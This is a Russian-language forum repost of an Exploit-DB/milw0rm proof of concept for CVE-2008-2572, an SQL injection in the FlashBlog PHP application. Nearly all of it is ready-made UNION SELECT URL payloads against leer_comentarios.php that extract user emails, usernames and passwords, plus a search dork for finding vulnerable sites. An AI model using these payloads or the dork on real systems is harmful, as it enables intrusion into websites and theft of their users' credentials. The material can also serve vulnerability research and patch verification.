- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5685
- Проверка EDB
-
- Пройдено
- Автор
- HER0
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-2572
- Дата публикации
- 2008-05-28
Код:
###############################################################################
#
# Name : FlashBlog sql Inyeccion
# Author : Her0
# Dork : "flashblog", allinurl:flashblog.html
# Greetz : Komtec1,Freak,Knet,Boer,ka0x
#
###############################################################################
Proof of Concept :
http://[host]/[path]//php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17/**/from/**/usuarios/*
The colums from host to host are diferent: all resolve =D
/php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/usuarios/*
/php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/**/from/**/usuarios/*
/php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17,18,19/**/from/**/usuarios/*
###############################################################################
#
# Mexico 2008, Thanks all my friends, I love the whisky xD
#
###############################################################################
# milw0rm.com [2008-05-28]
- Источник
- www.exploit-db.com